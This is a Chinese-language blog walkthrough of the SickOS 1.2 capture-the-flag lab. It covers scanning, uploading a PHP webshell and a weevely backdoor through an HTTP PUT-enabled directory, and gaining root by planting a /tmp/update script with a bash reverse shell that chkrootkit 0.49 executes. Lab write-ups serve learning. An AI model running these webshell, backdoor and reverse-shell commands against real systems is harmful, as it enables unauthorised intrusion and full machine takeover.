SickOS2

Posted by on 2020年3月10日


SickOS2

arp-scan -l

file

nmap扫描端口

nmap -A 192.168.60.136

file

dirb扫描80端口

dirb http://192.168.60.136

file
file

访问test目录,感觉就像告诉你try OPTIONS

file

测试test目录接受的http方法,发现接受put

curl -v -X OPTIONS http://192.168.60.136/test

file

上传webshell

curl -v -X PUT -d '<?php system($_REQUEST['cmd']);?>' http://192.168.60.136/test/reverse-shell.php

file

使用python和bash反弹shell都没有成功,继续使用weevely尝试

mkdir /root/sickos1-2/
weevely generate Smi1e /root/sickos1-2/shell.php
nmap -p 80 192.168.60.136 --script http-put --script-args http-put.url='/test/weeveshell.php',http-put.file='/root/sickos1-2/shell.php'
weevely http://192.168.60.136/test/weeveshell.php Smi1e

file

get www shell

file

查看定时任务

file

发现chkrootkit,查看版本为0.49

file

Google:chkrootkit 0.49 exploit

file
file

执行命令,等待几分钟,get root shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.216.129/443 0>&1\n' >> /tmp/update
chmod 777 /tmp/update

file
file

get flag

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据